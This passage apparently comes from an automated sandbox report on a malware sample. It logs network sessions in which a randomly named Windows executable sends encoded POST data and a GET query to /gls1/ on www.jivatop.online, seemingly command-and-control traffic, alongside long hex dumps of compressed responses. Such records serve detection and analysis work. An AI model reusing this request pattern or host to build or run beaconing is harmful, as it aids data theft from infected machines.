                                                                      Nov 6, 2024 05:23:44.092072010 CET212INData Raw: 5d ed c3 96 88 ca 20 4c 88 52 6b 0b 7f ff e3 d3 9b 2a 62 c5 e4 17 89 70 e2 11 f8 1f 00 f8 33 3a 75 ee d9 e7 af af bb 9f 8c b7 17 ae af 2e 46 ac 38 75 ef 17 de 9e ba f4 a6 24 d9 8b 77 f6 d2 39 39 23 a2 1b 24 4f f4 42 80 5f ff da 42 c4 54 96 90 72
                                                                      Data Ascii: ] LRk*bp3:u.F8u$w99#$OB_BTr%Hp-^O?BlSJp8Bmu_7SJpRv}['q0O&N)_tOzLC;nQ{>ht7kJ
                                                                      Nov 6, 2024 05:23:44.092145920 CET1236INData Raw: 84 8c ea f2 8c e7 ff 9b d9 b5 9f 9b 3e ea c9 3d d3 fb ce 56 d0 ca 15 e3 d4 ed fe 97 96 f0 5f 66 6c bb 60 76 cd c0 3c 31 87 6e 2d df d9 2a 62 4a 12 1d 9f b1 86 5f 9a 7d 33 b6 9b 0e 34 ec 03 d3 ff ce 16 10 0a 71 c3 6d bd 97 57 f0 2b db 35 23 33 40
                                                                      Data Ascii: >=V_fl`v<1n-*bJ_}34qmW+5#3@A4<9COmaI4],/oQ.8=kxk+/+=t6ZUD$N+W[{4?5WnZ~Z4_/O_]7{AyV~WjdKR'4uLmjeq?f"(x8
                                                                      Nov 6, 2024 05:23:44.092187881 CET1236INData Raw: dd d3 c0 fc bb 73 d7 dc 03 d1 65 3b 34 43 33 9e 2a a1 b3 01 d9 0f be b5 f3 35 c7 7e d3 0d d1 8e 08 28 91 30 0d 05 91 94 e7 65 0e 21 91 5a a8 38 cc 9b 9d 3a 2b 6c 08 2f d7 1b 1a 1a b9 a9 8b 86 37 bf 32 63 f3 c8 ec 9b 5e 80 ba 6b e4 f4 31 26 72 b0
                                                                      Data Ascii: se;4C3*5~(0e!Z8:+l/72c^k1&rY]9D=g]w}`aX{f~O7my'>@qdd`FilF_9Ve.I?B)V$S!YK*]4Rou\@m)#NgWNM;Deev
                                                                      Nov 6, 2024 05:23:44.092204094 CET1236INData Raw: 47 16 28 b3 8b 3d 68 23 bb 63 1f 3a 28 d9 73 6e 01 62 c9 54 81 6b 2c fa e9 a7 4c ed 54 08 38 bd b9 8e 2f df 30 95 f0 dd e4 a3 25 e9 14 44 b2 82 50 f4 cc 0b 2a 53 a6 62 9a 40 01 2a cf 28 c6 6e 49 49 20 66 5a 0a a5 4f bc 7b a6 32 49 0a a6 41 31 9d
                                                                      Data Ascii: G(=h#c:(snbTk,LT8/0%DP*Sb@*(nII fZO{2IA1Xt.99oPVv?f3f`tR<L;lV^:I#t]CS)^z+dD'"TgRe.)5vvPFjB]}4wc;
                                                                      Nov 6, 2024 05:23:44.092243910 CET1236INData Raw: 0c b9 4a 44 d1 d0 1d cc b6 ad e1 fd 3a 53 b1 36 32 35 1f 6a bf a2 d0 a8 7a d1 ec 5d e7 17 ec 57 e5 ac 7d df 85 f6 29 8e 6a 18 22 f9 aa 77 13 7c 65 d4 e7 fe fd 9e bf e0 c0 f4 ec 3d 4c 88 dc 09 6c f7 38 73 5e 57 76 8d 77 30 65 81 5b 52 b2 b6 d0 a2
                                                                      Data Ascii: JD:S625jz]W})j"w|e=Ll8s^Wvw0e[R`BQ4Y%R' &g+SZ,BfN<D~#?N<}6C=vSmUmXgx)WcS95K*3D!wA[PX"!Qa\'4S;
                                                                      Nov 6, 2024 05:23:44.092255116 CET744INData Raw: fd 4f d0 65 78 7a 2a 63 70 aa 67 ac eb 3d 80 57 e4 94 ef 9a 9e 43 14 4c 1d 7f 81 bf 7a 5a 69 5f bb ed 1e 71 30 21 c1 ab a6 fd 60 ef 03 fa 1f 07 93 ba d9 a9 42 db 24 11 de 60 d5 e7 e5 37 f8 f1 b7 34 51 ba a0 50 b0 2a f0 ab 40 40 51 d0 08 e7 a8 70
                                                                      Data Ascii: Oexz*cpg=WCLzZi_q0!`B$`74QP*@@QpQ"UKHkzUnk0&0_I%@h}=l 90U`Ad/&tS>?*h_0(@Kta8mr3-Z+|OHaPwpr089


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      26192.168.2.650013185.179.189.193804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:23:45.593503952 CET777OUTPOST /gls1/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.jivatop.online
                                                                      Origin: http://www.jivatop.online
                                                                      Connection: close
                                                                      Content-Length: 233
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jivatop.online/gls1/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 5a 67 32 4e 68 58 42 6b 57 79 44 72 48 38 43 4c 69 38 76 77 47 67 78 39 73 54 6c 78 64 78 72 31 79 39 53 37 54 33 35 66 39 5a 66 76 35 6d 52 64 37 66 45 72 58 33 67 49 76 51 32 6e 71 44 2b 4c 58 70 4a 7a 70 42 4e 37 54 65 79 71 33 65 6b 7a 56 79 72 49 73 69 32 65 6b 4e 6d 57 35 6f 4d 6b 55 41 6d 64 6a 4b 51 65 56 30 56 63 33 38 54 4f 66 6b 48 30 59 33 6a 4e 54 52 66 6d 58 47 42 69 31 4d 74 67 6e 65 45 47 4b 49 52 61 44 6e 51 35 47 68 77 2f 70 6e 63 61 45 56 2b 62 63 55 71 49 5a 2f 73 71 48 56 57 46 58 68 66 51 6e 50 62 5a 33 75 7a 74 45 59 53 52 48 30 47 52 4f 54 70 6f 50 4d 69 50 59 39 31 50 79 70 46 56 31 4c 6e 62 43 54 79 36 4d 4d 62 38 4e 62 7a 7a 38 4b 70 4e 35 51 3d 3d
                                                                      Data Ascii: 08rl=Zg2NhXBkWyDrH8CLi8vwGgx9sTlxdxr1y9S7T35f9Zfv5mRd7fErX3gIvQ2nqD+LXpJzpBN7Teyq3ekzVyrIsi2ekNmW5oMkUAmdjKQeV0Vc38TOfkH0Y3jNTRfmXGBi1MtgneEGKIRaDnQ5Ghw/pncaEV+bcUqIZ/sqHVWFXhfQnPbZ3uztEYSRH0GROTpoPMiPY91PypFV1LnbCTy6MMb8Nbzz8KpN5Q==
                                                                      Nov 6, 2024 05:23:46.664419889 CET1236INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Wed, 06 Nov 2024 04:23:46 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Content-Encoding: gzip
                                                                      Expires: Wed, 06 Nov 2024 04:23:46 GMT
                                                                      Set-Cookie: _subid=28p5d372dq9od; expires=Sat, 07 Dec 2024 04:23:46 GMT; path=/
                                                                      Set-Cookie: 7e41a=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjlcIjoxNzMwODY3MDI2fSxcImNhbXBhaWduc1wiOntcIjNcIjoxNzMwODY3MDI2fSxcInRpbWVcIjoxNzMwODY3MDI2fSJ9.x9YXr2B6hWIGRsd6QRxpS7YIAV22GiSEElc-bXr8hIw; expires=Wed, 13 Sep 2079 08:47:32 GMT; path=/
                                                                      Vary: Accept-Encoding
                                                                      X-Powered-By: PHP/7.4.33
                                                                      Access-Control-Allow-Origin: *
                                                                      Data Raw: 64 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 ff ec 7d 5f 73 1b c9 75 ef fb 7e 8a 31 1f 6e dd 5b 57 47 14 a5 5d 4a 4b 93 f2 83 af 6f 25 2f 49 2a 59 97 2b 4f ac c6 4c 13 d3 ab 99 ee 49 77 cf 48 80 6a ab 08 62 b5 d2 86 5a 31 5e bb ec d4 7a 37 bb ae a4 e2 54 b9 1c 83 14 b1 84 f8 07 ac d2 27 e8 fe 0a fe 24 a9 3e 3d 20 48 89 84 24 87 1b 0c 56 a3 07 11 18 cc 0c 1a c0 e9 f3 3b 7f 7f e7 9d e5 1f fc bf bf fe f1 07 7f ff 37 3f 09 62 9d 26 b7 df 59 76 7f 82 84 f0 e6 ca 1c e5 73 b7 df 09 82 20 58 8e 29 89 6e 2f 37 88 a2 41 2c e9 da ca dc 7c 42 78 44 e5 3c 17 85 50 9a 81 a2 4d 11 f1 16 01 80 42 51 28 0f cf 33 1e d1 7b 57 b3 38 2b 6f 84 37 4b a9 26 41 ac 75 06 f4 1f 72 56 ac cc fd 58 70 4d b9 86 0f 5a 19 9d 0b 42 ff 6c 65 4e d3 7b 7a de 2d e7 87 41 18 13 a9 a8 5e f9 e9 07 ff 1f 6e cd 05 f3 a7 ee a6 99 4e e8 6d f3 95 19 9a 1d 33 b4 1d bb 61 06 81 ed 98 be 79 6a 86 66 d7 1c d9 ad 60 29 30 9f bb 43 81 39 3a 7d da f2 bc bf f8 85 a5 71 92 d2 95 b9 82 d1 bb 99 90 fa d4 82 ee b2 48 c7 2b 11 2d 58 48 01 9f 5c 09 18 67 9a 91 [TRUNCATED]
                                                                      Data Ascii: d96}_su~1n[WG]JKo%/I*Y+OLIwHjbZ1^z7T'$>= H$V;7?b&Yvs X)n/7A,|BxD<PMBQ(3{W8+o7K&AurVXpMZBleN{z-A^nNm3ayjf`)0C9:}qH+-XH\gTHpvmwI9[U1zCj]~*:<.QMiC|2G$ <wJbikfwDg>]),sbmVn\w_ YP"cxS3~trGJ@peC5~Qy{yo
                                                                      Nov 6, 2024 05:23:46.664438009 CET212INData Raw: dc e5 3e 6c 88 a8 15 84 09 51 6a 65 ee 6f 7f 7a 7a 53 45 ac 18 bd 90 08 27 1e 81 ff 03 80 7f a3 53 e7 9e 7f fe ea aa fb cb 78 73 ee f6 f2 7c c4 8a 53 f7 7e e1 e9 a9 4b ef 4a 92 bd 78 67 2f 9d a3 33 22 ba 46 f2 44 cf 05 f8 f3 af cc 45 4c 65 09 69
                                                                      Data Ascii: >lQjeozzSE'Sxs|S~KJxg/3"FDELei-kI&+s;s69,m4UW3<yf[{?<k?+9`;<rn|>ms`zfrZOM![NhdE
                                                                      Nov 6, 2024 05:23:46.664531946 CET1236INData Raw: 89 90 51 dd 3a e7 fd ff c5 6c db 4f 4d 1f f5 e4 8e e9 7d 67 2b 68 e4 8a 71 ea 76 ff 4b 4b f8 0f 33 b4 5d 30 db 66 60 f6 cc 91 5b cb 77 b6 8a 98 92 44 c7 e7 ac e1 d7 66 d7 0c ed ba 03 0d fb d8 f4 bf b3 05 84 42 dc 71 5b ef e5 15 7c 61 bb e6 c0 0c
                                                                      Data Ascii: Q:lOM}g+hqvKK3]0f`[wDfBq[|aPMay>OS[XMW5K[N/}k/Io:a-"Hy=R;M/\kO}C~\EHDx'=c$hSKw!+U
                                                                      Nov 6, 2024 05:23:46.664542913 CET1236INData Raw: 76 d0 6a 86 95 7a 01 99 24 05 d3 34 51 ba a0 50 30 1f 2f 60 0a 04 14 05 8d 28 67 0c 6b 27 9b 02 0a 16 8b 88 bb 47 58 57 59 80 14 aa b6 b1 a6 19 84 7a bf da 9a bf 16 ae d9 82 87 cf 03 f3 f5 48 51 a3 fd ed 54 be 57 f6 7d a7 ec 37 4f c7 aa 30 88 f5
                                                                      Data Ascii: vjz$4QP0/`(gk'GXWYzHQTW}7O08@p']oIT< i!_7(D^d3"N@iE9(@\,AiITuLF5Wu"5tF;`#tF'%9=|azsbAt
                                                                      Nov 6, 2024 05:23:46.664554119 CET1236INData Raw: 80 d3 bb ab f8 f0 35 53 22 df 51 b1 97 90 9a 69 68 c7 ac cd a1 91 b0 76 c8 52 60 10 8a 24 a1 4d 92 02 88 06 27 52 44 a2 20 9c 80 d0 85 24 da a9 0e 4e 5a 04 32 c9 9c 7e 08 09 a4 24 21 b1 28 ea c2 cb 29 a6 e4 2b 5e e1 55 0b da cc 42 cf d7 58 b9 bb
                                                                      Data Ascii: 5S"QihvR`$M'RD $NZ2~$!()+^UBXL/72=?%5/=I&=sKI?;0uMRz}P$?^bND`3g'B!I9Lb1=EmMCQ)JH-q3&'FBCD
                                                                      Nov 6, 2024 05:23:46.664565086 CET1236INData Raw: 2a 81 61 dd 93 2b ed 04 38 a8 68 0f 87 5f 74 46 99 8c 47 65 7e bb 1f fc e9 e3 5f fd 69 fd d3 c5 eb e5 dc 53 3c 56 b6 30 1c 9d 4c 3b f2 80 e3 ee b9 7b 02 5e 87 25 d0 9d cc 4a 1d 9a c3 c0 76 83 92 f0 c3 f7 2c 54 d1 7b 99 31 de 8e 4b 1a 5a 47 da 05
                                                                      Data Ascii: *a+8h_tFGe~_iS<V0L;{^%Jv,T{1KZG I*Sb@lJ,mE fZ!hTS~&(skToj)QPfTkJF~{tulz9Jb+xaD9]\'Dl"(W<3Fm
                                                                      Nov 6, 2024 05:23:46.664576054 CET693INData Raw: 28 73 35 85 df 2b d7 7c 79 ea bf 21 12 a6 a1 29 70 98 7b e6 77 28 67 31 b4 49 43 24 b4 20 9c b5 48 ed ae 4f 31 0c f4 6e 95 5d 80 5a 82 aa ab eb cb a4 2c 4e 63 7e 5a 06 7d 76 46 f4 14 27 1a bd e4 c8 73 da 6e 94 c4 2d 07 6b da ad 4a c6 72 de ca 28
                                                                      Data Ascii: (s5+|y!)p{w(g1IC$ HO1n]Z,Nc~Z}vF'sn-kJr(~!S[t4$cB&s%`X>UoTeyP,ScnfvAdh^krTvzFwgs{_zVj_#2<ec(uq+|9TIP@I


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      27192.168.2.650014185.179.189.193804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:23:48.136862040 CET1790OUTPOST /gls1/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.jivatop.online
                                                                      Origin: http://www.jivatop.online
                                                                      Connection: close
                                                                      Content-Length: 1245
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jivatop.online/gls1/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 5a 67 32 4e 68 58 42 6b 57 79 44 72 48 38 43 4c 69 38 76 77 47 67 78 39 73 54 6c 78 64 78 72 31 79 39 53 37 54 33 35 66 39 5a 58 76 36 55 5a 64 34 34 34 72 57 33 67 49 6a 77 32 6b 71 44 2b 73 58 70 52 33 70 42 4a 72 54 63 4b 71 33 38 73 7a 45 54 72 49 69 53 32 65 70 74 6d 58 39 6f 4d 31 55 41 57 52 6a 4b 41 65 56 30 56 63 33 2f 4c 4f 57 56 48 30 4c 48 6a 4b 44 42 66 36 54 47 42 4b 31 4d 31 61 6e 65 52 7a 4c 34 78 61 45 48 41 35 4b 7a 6f 2f 6f 48 63 59 4a 31 2b 44 63 55 6d 68 5a 2f 77 4d 48 57 4b 76 58 69 44 51 6b 5a 57 6e 6b 71 2f 6f 65 75 4f 65 58 54 6d 58 47 58 74 4d 4e 38 2b 2b 56 64 78 63 74 6f 78 33 2b 63 4c 6a 44 43 6a 31 61 74 72 4d 4f 4d 43 65 79 4a 45 4b 75 4b 2b 62 49 37 75 74 46 2b 2f 34 53 69 4d 56 47 4b 6e 78 76 58 66 6e 48 73 41 67 4d 57 51 4e 51 66 42 5a 31 61 78 4a 73 4d 56 70 58 42 6e 67 4f 41 4f 45 4e 6d 63 45 77 4f 5a 77 31 43 74 44 44 38 75 68 46 30 48 46 49 59 6c 45 2b 4f 71 64 77 59 77 43 43 36 76 63 6a 4c 4d 33 51 6f 62 76 2b 75 71 73 4c 73 71 64 32 41 32 47 61 [TRUNCATED]
                                                                      Data Ascii: 08rl=Zg2NhXBkWyDrH8CLi8vwGgx9sTlxdxr1y9S7T35f9ZXv6UZd444rW3gIjw2kqD+sXpR3pBJrTcKq38szETrIiS2eptmX9oM1UAWRjKAeV0Vc3/LOWVH0LHjKDBf6TGBK1M1aneRzL4xaEHA5Kzo/oHcYJ1+DcUmhZ/wMHWKvXiDQkZWnkq/oeuOeXTmXGXtMN8++Vdxctox3+cLjDCj1atrMOMCeyJEKuK+bI7utF+/4SiMVGKnxvXfnHsAgMWQNQfBZ1axJsMVpXBngOAOENmcEwOZw1CtDD8uhF0HFIYlE+OqdwYwCC6vcjLM3Qobv+uqsLsqd2A2GauPZWIcMI5weBdJhBDIFyarZf3Ra/epQT8/Ll8ff7UrUtqKuqaeL0jFEFaadZSv35AsQzid7+DOPgH2tRbxvdh4JXMp44cGBO2yzjntqU9bQ1bunqSV2OsgOOyq5DJqQP1iM8DswjYrvp82i293INbjslNz/5bqhL1bu3Qkx+OBd64YjCbCOcjMowx2tAxkyKvMUh79qaC83RVugsLgM1Vo19YBcllspO1yv6e7+LC0PcQ6aaIAmHtEXAq/Xpu//fDSgptzDdJrNaBGbMOLbV7ky6cHWvF8706Sv+oOWW02+xTdyYr+UpeHJAv92gqrvEmSRXC5+z4TfOwuSlRO3Hpv6VAc1pt0iMPt6N2euCBipP2OB6m/DsHNot9QAEXBz4GmftEmHHtZkFEEgOgOwhGkkc26SK+HXqj8g2cKSGpcVvxorPW5ijMGX0fK5/t7ZCkh2PBChggSwT3B9nvYBjgi9WluvLKjUfCljdlJv2xBNLWMUpmi567rbOQCurh8k2VgSlvCMUipZ3xaAgi0IKxrf77OZ39cw3wP9jV9e3OJkp6gzBK6Fr/kMCXBVabxTdHZay7zFPh1hK7zXkvOBL+LsP/GT6IzOvlS7zYJJUXPbFBgY0bFZqTBZOF0u5p5tZ6UOFLD1llD8KxQcKmWd+3l1lLB3C+nj9hC [TRUNCATED]
                                                                      Nov 6, 2024 05:23:49.124341965 CET1236INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Wed, 06 Nov 2024 04:23:48 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Content-Encoding: gzip
                                                                      Expires: Wed, 06 Nov 2024 04:23:48 GMT
                                                                      Set-Cookie: _subid=28p5d372dq9oe; expires=Sat, 07 Dec 2024 04:23:48 GMT; path=/
                                                                      Set-Cookie: 7e41a=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjlcIjoxNzMwODY3MDI4fSxcImNhbXBhaWduc1wiOntcIjNcIjoxNzMwODY3MDI4fSxcInRpbWVcIjoxNzMwODY3MDI4fSJ9.5VcnCGrXu2t15R2Ezm5nnLR8c8hpxW8pTBDfDyViEwg; expires=Wed, 13 Sep 2079 08:47:36 GMT; path=/
                                                                      Vary: Accept-Encoding
                                                                      X-Powered-By: PHP/7.4.33
                                                                      Access-Control-Allow-Origin: *
                                                                      Data Raw: 64 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 ff ec 7d 5f 6f 1b c9 95 ef fb 7c 8a 8e 1e 2e ee c5 f5 b1 2c 7b fc 67 1c c9 79 c8 cd c5 bd 2f f7 2e 76 27 08 f6 49 28 76 97 d8 35 ee ae ea ad aa 6e bb 69 0c 20 89 e3 d1 cc da 63 6d 9c 20 59 24 93 9d 09 76 b1 59 60 b0 1b 5a 16 2d 5a 7f 28 c0 9f a0 ea 2b e4 93 2c ea 54 93 a2 64 89 b6 b3 1a b0 15 b7 1f 2c b2 59 d5 2c 92 a7 ce af ce bf df f9 60 f1 07 ff eb ff ff f8 e3 bf fd ab 9f 04 b1 4e 93 3b 1f 2c ba 3f 41 42 78 7b 69 8e f2 b9 3b 1f 04 41 10 2c c6 94 44 77 16 5b 44 d1 20 96 74 65 69 6e 3e 21 3c a2 72 9e 8b 42 28 cd 40 d1 b6 88 78 49 00 a0 50 14 aa cb f3 8c 47 f4 fe e5 2c ce aa 1b e1 cd 52 aa 49 10 6b 9d 01 fd bb 9c 15 4b 73 3f 16 5c 53 ae e1 e3 32 a3 73 41 e8 9f 2d cd 69 7a 5f cf bb e5 fc 30 08 63 22 15 d5 4b 3f fd f8 7f c3 ad b9 60 7e e2 6e 9a e9 84 de 31 bf 33 43 b3 65 86 76 cd ae 9b 41 60 d7 4c df 3c 37 43 b3 6d 0e ec 66 70 3b 30 4f dd a5 c0 1c 4c 0e 5b 9c f7 93 4f 2c 8d 93 94 2e cd 15 8c de cb 84 d4 13 0b ba c7 22 1d 2f 45 b4 60 21 05 7c 72 29 60 9c 69 46 [TRUNCATED]
                                                                      Data Ascii: d96}_o|.,{gy/.v'I(v5ni cm Y$vY`Z-Z(+,Td,Y,`N;,?ABx{i;A,Dw[D tein>!<rB(@xIPG,RIkKs?\S2sA-iz_0c"K?`~n13CevA`L<7Cmfp;0OL[O,."/E`!|r)`iFP!I%$M.bJ\JPw~*}^u~TBS1.$+nwDg>M`i{~e@UKsvr_[,K(h1LB2(.}SO*,!6~
                                                                      Nov 6, 2024 05:23:49.124360085 CET1236INData Raw: 5d ed c3 96 88 ca 20 4c 88 52 4b 73 7f fd d3 c9 4d 15 b1 62 f4 42 22 9c 78 04 fe 0f 00 fe 8d 26 c6 9e 3e 7e 79 d9 fd 65 bc 3d 77 67 71 3e 62 c5 c4 bd 4f 3c 9d 98 7a 4f 92 ec e4 9d bd 74 8e 46 44 74 85 e4 89 9e 0b f0 e7 5f 9a 8b 98 ca 12 52 de 0e
                                                                      Data Ascii: ] LRKsMbB"x&>~ye=wgq>bO<zOtFDt_RVz'|R}s&Mr+!z8m{r7)kvpJv~JN'N)xw;:'c~aLlnQ{=!-dtFO)OQOnVn3C
                                                                      Nov 6, 2024 05:23:49.124370098 CET1236INData Raw: 8e 7d f3 f2 34 af e0 e2 7c 7c f5 ec 20 cd 49 b7 df 42 ad dc 7e 77 49 08 aa 20 92 69 70 47 e9 88 68 08 41 69 91 e4 90 d1 24 a5 9c 41 01 ad 3c 11 9c 02 48 aa 15 cd 34 40 48 42 a7 3c a9 d2 42 12 4e 1b dd 37 2b ec 0d 6f 78 ec 9d ea 58 9f 21 f8 36 e2
                                                                      Data Ascii: }4|| IB~wI ipGhAi$A<H4@HB<BN7+oxX!6u7gvmUquCLn]G^BGs^`.^h?7}sh/X"JE3.n&RVdjQ1IHDD$qagA#S=cvm34;
                                                                      Nov 6, 2024 05:23:49.124378920 CET1236INData Raw: 7e 52 53 3b e4 ac 55 9f 3b 20 64 94 3b 61 a3 52 14 00 79 95 e3 11 03 55 1a 94 26 9d 18 ae 5e 81 84 6a 80 4e 1c 51 0d 2d 91 a8 58 94 a0 ca 5c 66 92 75 9a 1d 3b b3 a2 f5 9b b5 2e 94 68 e4 ea e2 20 c1 37 58 2c ec ce f1 58 eb e6 b3 5b 2f 05 0e 13 26
                                                                      Data Ascii: ~RS;U; d;aRyU&^jNQ-X\fu;.h 7X,X[/&{z\8$Uc$Ey>UT,T>2IitA`*$g)(GH]xg2k zp],xo0H}ItB%PQ=Icy=woG
                                                                      Nov 6, 2024 05:23:49.124391079 CET1236INData Raw: 36 92 79 5b 94 20 49 27 a5 12 24 69 09 f7 32 46 e5 d2 63 99 7b a2 55 92 82 25 0c c4 b8 44 94 36 99 7a 33 4c 0d ad b7 2b a7 91 b9 bf 08 c0 38 2a 4c 1e 78 0f bc ef b5 b9 81 19 a1 3d fb 04 cb 8e 8f 70 c4 6c 63 20 e0 b9 4f f4 f1 61 61 07 06 ab 97 03
                                                                      Data Ascii: 6y[ I'$i2Fc{U%D6z3L+8*Lx=plc Oaa}5#1"Zr,oSP O0V1SlJgkK3a7z"ks8wa1a9@V:sd1_x@]h(`2W-Z+Fj{v1;
                                                                      Nov 6, 2024 05:23:49.124402046 CET903INData Raw: 0c bc 71 cd e7 a3 de db 4c d3 84 96 70 97 a4 61 4c 74 c8 40 a8 50 c8 16 b6 7d 4a 44 41 a0 24 61 de c2 c6 80 04 0a a0 2b 4c 52 00 c8 44 42 21 8c f3 88 2a 68 ea fc 67 98 fa 5f ef 74 9d 46 bc 2e 9a f2 ff d5 a8 83 18 b6 f6 c2 7e 03 fb 3e b0 eb bd f8
                                                                      Data Ascii: qLpaLt@P}JDA$a+LRDB!*hg_tF.~>Cwv'lkzEwp7*`TizE!0MC%SHb$rgV4$IcM4HTuO@vD4S|v2{U+j<jh5}


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      28192.168.2.650015185.179.189.193804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:23:50.684751987 CET488OUTGET /gls1/?08rl=Uietig4+TC7NFrmVovLlYTtapWMzZT+64cq6Twhm5LT452F0v+MmXRVXnhGmnx2GSIt0lnB8FurFze9iLSXa+V/AuOXwrYJIOTbzpbQadjdR6tTkWXHxVhPzUUbSeXZg4P1XpJA=&IrPLc=Knb4R HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Host: www.jivatop.online
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Nov 6, 2024 05:23:51.677463055 CET1236INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Wed, 06 Nov 2024 04:23:51 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 65164
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 06 Nov 2024 04:23:51 GMT
                                                                      Set-Cookie: _subid=28p5d372dq9oh; expires=Sat, 07 Dec 2024 04:23:51 GMT; path=/
                                                                      Set-Cookie: 7e41a=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjlcIjoxNzMwODY3MDMxfSxcImNhbXBhaWduc1wiOntcIjNcIjoxNzMwODY3MDMxfSxcInRpbWVcIjoxNzMwODY3MDMxfSJ9.e3TJKpk3hQYytDfgYRmLSuaieeoM_Iuz4oNPHsuKfgg; expires=Wed, 13 Sep 2079 08:47:42 GMT; path=/
                                                                      Vary: Accept-Encoding
                                                                      X-Powered-By: PHP/7.4.33
                                                                      Access-Control-Allow-Origin: *
                                                                      Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 2f 6e 6f 76 6f 73 74 69 2d 73 65 67 6f 64 6e 79 61 2d 2d 2d 76 73 65 2d 6e 6f 76 6f 73 74 69 2f 69 6e 64 65 78 2e 70 68 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e d0 9d d0 be d0 b2 d0 be d1 81 d1 82 d0 b8 20 d1 81 d0 b5 d0 b3 d0 be d0 b4 d0 bd d1 8f 20 3a 20 d0 92 d1 81 d0 b5 20 d0 bd d0 be d0 b2 d0 be d1 81 d1 82 d0 b8 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"> <head><base href="/lander/novosti-segodnya---vse-novosti/index.php"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title> : </title> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" href="css/fonts.css" /> <link rel="stylesheet" href="css/header.css" /> <link rel="stylesheet" href="css/style.css?v1" /> <link rel="stylesheet" href="css/me
